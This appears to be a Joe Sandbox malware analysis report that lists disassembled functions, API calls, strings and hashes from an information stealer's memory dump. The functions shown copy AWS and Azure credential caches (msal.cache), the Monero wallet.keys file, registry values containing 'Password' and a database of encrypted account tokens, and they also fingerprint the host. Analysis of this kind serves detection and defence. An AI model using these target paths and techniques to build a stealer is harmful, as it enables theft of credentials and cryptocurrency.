Part of subcall function 000B4910: FindFirstFileA.KERNEL32(?,?), ref: 000B4943

lstrcat.KERNEL32(?,00000000), ref: 000B4E3C
lstrcat.KERNEL32(?,\.aws\), ref: 000B4E59

Part of subcall function 000B4910: StrCmpCA.SHLWAPI(?,000C0FDC), ref: 000B4971
Part of subcall function 000B4910: StrCmpCA.SHLWAPI(?,000C0FE0), ref: 000B4987
Part of subcall function 000B4910: FindNextFileA.KERNEL32(000000FF,?), ref: 000B4B7D
Part of subcall function 000B4910: FindClose.KERNEL32(000000FF), ref: 000B4B92

lstrcat.KERNEL32(?,00000000), ref: 000B4EC8
lstrcat.KERNEL32(?,\.IdentityService\), ref: 000B4EE5

Part of subcall function 000B4910: wsprintfA.USER32 ref: 000B49B0
Part of subcall function 000B4910: StrCmpCA.SHLWAPI(?,000C08D2), ref: 000B49C5
Part of subcall function 000B4910: wsprintfA.USER32 ref: 000B49E2
Part of subcall function 000B4910: PathMatchSpecA.SHLWAPI(?,?), ref: 000B4A1E
Part of subcall function 000B4910: lstrcat.KERNEL32(?,0139F600), ref: 000B4A4A
Part of subcall function 000B4910: lstrcat.KERNEL32(?,000C0FF8), ref: 000B4A5C
Part of subcall function 000B4910: lstrcat.KERNEL32(?,?), ref: 000B4A70
Part of subcall function 000B4910: lstrcat.KERNEL32(?,000C0FFC), ref: 000B4A82
Part of subcall function 000B4910: lstrcat.KERNEL32(?,?), ref: 000B4A96
Part of subcall function 000B4910: CopyFileA.KERNEL32(?,?,00000001), ref: 000B4AAC
Part of subcall function 000B4910: DeleteFileA.KERNEL32(?), ref: 000B4B31

Strings

Azure\.IdentityService, xrefs: 000B4EEB
\.azure\, xrefs: 000B4DC1
Azure\.aws, xrefs: 000B4E5F
*.*, xrefs: 000B4E64
Azure\.azure, xrefs: 000B4DD3
\.IdentityService\, xrefs: 000B4ED9
msal.cache, xrefs: 000B4EF0
*.*, xrefs: 000B4DD8
\.aws\, xrefs: 000B4E4D

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 949356159-974132213
Opcode ID: b654b38076d0491b025e10415ee04051e2d25644aaf930c601bd260018429fe3
Instruction ID: e093b6688e39ab0e8525a79189638cf9326f51902ecf949606064000a71e3101
Opcode Fuzzy Hash: b654b38076d0491b025e10415ee04051e2d25644aaf930c601bd260018429fe3
Instruction Fuzzy Hash: 114174BAA4020467DB10F770EC97FED7338AB65700F404558B685AA0C3EEB45BC9CB92

Function 000A1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 000A12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000A12B4
Part of subcall function 000A12A0: RtlAllocateHeap.NTDLL(00000000), ref: 000A12BB
Part of subcall function 000A12A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 000A12D7
Part of subcall function 000A12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 000A12F5
Part of subcall function 000A12A0: RegCloseKey.ADVAPI32(?), ref: 000A12FF

lstrcat.KERNEL32(?,00000000), ref: 000A134F
lstrlen.KERNEL32(?), ref: 000A135C
lstrcat.KERNEL32(?,.keys), ref: 000A1377

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Part of subcall function 000BA9B0: lstrlen.KERNEL32(?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000BA9C5
Part of subcall function 000BA9B0: lstrcpy.KERNEL32(00000000), ref: 000BAA04
Part of subcall function 000BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000BAA12

Part of subcall function 000BA8A0: lstrcpy.KERNEL32(?,000C0E17), ref: 000BA905

Part of subcall function 000B8B60: GetSystemTime.KERNEL32(000C0E1A,01399EE8,000C05AE,?,?,000A13F9,?,0000001A,000C0E1A,00000000,?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000B8B86

Part of subcall function 000BA920: lstrcpy.KERNEL32(00000000,?), ref: 000BA972
Part of subcall function 000BA920: lstrcat.KERNEL32(00000000), ref: 000BA982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 000A1465

Part of subcall function 000BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000BA7E6

Part of subcall function 000A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000A99EC
Part of subcall function 000A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000A9A11
Part of subcall function 000A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 000A9A31
Part of subcall function 000A99C0: ReadFile.KERNEL32(000000FF,?,00000000,000A148F,00000000), ref: 000A9A5A
Part of subcall function 000A99C0: LocalFree.KERNEL32(000A148F), ref: 000A9A90
Part of subcall function 000A99C0: CloseHandle.KERNEL32(000000FF), ref: 000A9A9A

DeleteFileA.KERNEL32(00000000), ref: 000A14EF

Strings

SOFTWARE\monero-project\monero-core, xrefs: 000A1335
wallet_path, xrefs: 000A1330
\Monero\wallet.keys, xrefs: 000A138D
.keys, xrefs: 000A136B

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 3478931302-218353709
Opcode ID: 560b915c96a0308918d34c8dba78433befe762195c63460c61af011e4f4e9c6b
Instruction ID: 9d1df9c8732435e2489e064aa5870bd8697b327ae07dcbb5f043e43b0ac49515
Opcode Fuzzy Hash: 560b915c96a0308918d34c8dba78433befe762195c63460c61af011e4f4e9c6b
Instruction Fuzzy Hash: 0E5136B1E50118A7CB15FB60DD96FED737CAF55300F404198B60A66093EE306B89CBA6

Function 000A75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000A72D0: memset.MSVCRT ref: 000A7314
Part of subcall function 000A72D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 000A733A
Part of subcall function 000A72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 000A73B1
Part of subcall function 000A72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 000A740D
Part of subcall function 000A72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 000A7452
Part of subcall function 000A72D0: HeapFree.KERNEL32(00000000), ref: 000A7459

lstrcat.KERNEL32(35D45020,000C17FC), ref: 000A7606
lstrcat.KERNEL32(35D45020,00000000), ref: 000A7648
lstrcat.KERNEL32(35D45020, : ), ref: 000A765A
lstrcat.KERNEL32(35D45020,00000000), ref: 000A768F
lstrcat.KERNEL32(35D45020,000C1804), ref: 000A76A0
lstrcat.KERNEL32(35D45020,00000000), ref: 000A76D3
lstrcat.KERNEL32(35D45020,000C1808), ref: 000A76ED
task.LIBCPMTD ref: 000A76FB

Strings

: , xrefs: 000A764E

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: :
API String ID: 3191641157-3653984579
Opcode ID: 3910ed82f845b28a872b77d9ce1a7640b1ca895485761d1661d138b636a01779
Instruction ID: c0b850413b623d34e508a1d4149511144a6e982f0076be2065ccdc73af594b10
Opcode Fuzzy Hash: 3910ed82f845b28a872b77d9ce1a7640b1ca895485761d1661d138b636a01779
Instruction Fuzzy Hash: C6310E71E44149DFCB08EBF4EC99EFE7779BB4A301B148118F102AB292DE34A946CB51

Function 000A72D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000A7314
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 000A733A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 000A73B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 000A740D
GetProcessHeap.KERNEL32(00000000,?), ref: 000A7452
HeapFree.KERNEL32(00000000), ref: 000A7459
task.LIBCPMTD ref: 000A7555

Strings

Password, xrefs: 000A7401

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettask
String ID: Password
API String ID: 2808661185-3434357891
Opcode ID: 923371ed251c5b37b0a71a57e88ca1c5263ac5657ebc435fd59291bbd4cf7cd0
Instruction ID: f2d1f807f2416d4b3bca1eb61badbacca37c9de07fac76200d5d575a191c0f85
Opcode Fuzzy Hash: 923371ed251c5b37b0a71a57e88ca1c5263ac5657ebc435fd59291bbd4cf7cd0
Instruction Fuzzy Hash: 8B61FBB5D041689BDB24DB90DC55FD9B7B8BF49300F00C1E9E649A6142EBB06BC9CFA1

Function 000B7500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 000B7542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000B757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 000B7603
RtlAllocateHeap.NTDLL(00000000), ref: 000B760A
wsprintfA.USER32 ref: 000B7640

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Strings

:, xrefs: 000B755C
\, xrefs: 000B7560
C, xrefs: 000B754C

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 1544550907-3809124531
Opcode ID: 3cc37a4a0ab0698acc42488a17a8f18991f8576d88bd5327315cce490e132feb
Instruction ID: 53444f7c2f51fe38f84413d734ebcd655b4bfd286fdb13bd08d4422f6daac30b
Opcode Fuzzy Hash: 3cc37a4a0ab0698acc42488a17a8f18991f8576d88bd5327315cce490e132feb
Instruction Fuzzy Hash: 8B41B4B1D44248ABDF20DF94DC95FEEBBB8EF48704F104099F5096B281DB74AA44CBA5

Function 000B8100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0139E9D0,00000000,?,000C0E2C,00000000,?,00000000), ref: 000B8130
RtlAllocateHeap.NTDLL(00000000), ref: 000B8137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 000B8158
__aulldiv.LIBCMT ref: 000B8172
__aulldiv.LIBCMT ref: 000B8180
wsprintfA.USER32 ref: 000B81AC

Strings

@, xrefs: 000B814D
%d MB, xrefs: 000B81A3

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2774356765-3474575989
Opcode ID: 0d71f2743daa9389c72cbe5edbbef8cb7c49238d4b914215715a4cfd8f85540f
Instruction ID: 0658c78bcfeb0b9b2cd444c71d39222133fcc5db237f22908861a4f62957f035
Opcode Fuzzy Hash: 0d71f2743daa9389c72cbe5edbbef8cb7c49238d4b914215715a4cfd8f85540f
Instruction Fuzzy Hash: 6421C9B1A44258ABDB10DFD5DC49FEEBBBCEB44B10F104519F605BB280D77869018BA5

Function 000ABA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Part of subcall function 000BA9B0: lstrlen.KERNEL32(?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000BA9C5
Part of subcall function 000BA9B0: lstrcpy.KERNEL32(00000000), ref: 000BAA04
Part of subcall function 000BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000BAA12

Part of subcall function 000BA920: lstrcpy.KERNEL32(00000000,?), ref: 000BA972
Part of subcall function 000BA920: lstrcat.KERNEL32(00000000), ref: 000BA982

Part of subcall function 000BA8A0: lstrcpy.KERNEL32(?,000C0E17), ref: 000BA905

Part of subcall function 000BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000BA7E6

lstrlen.KERNEL32(00000000), ref: 000ABC9F

Part of subcall function 000B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 000B8E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 000ABCCD
lstrlen.KERNEL32(00000000), ref: 000ABDA5
lstrlen.KERNEL32(00000000), ref: 000ABDB9

Strings

AccountTokens, xrefs: 000ABB49
AccountTokens, xrefs: 000ABABA
SELECT service, encrypted_token FROM token_service, xrefs: 000ABBEB
AccountId, xrefs: 000ABCC4

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
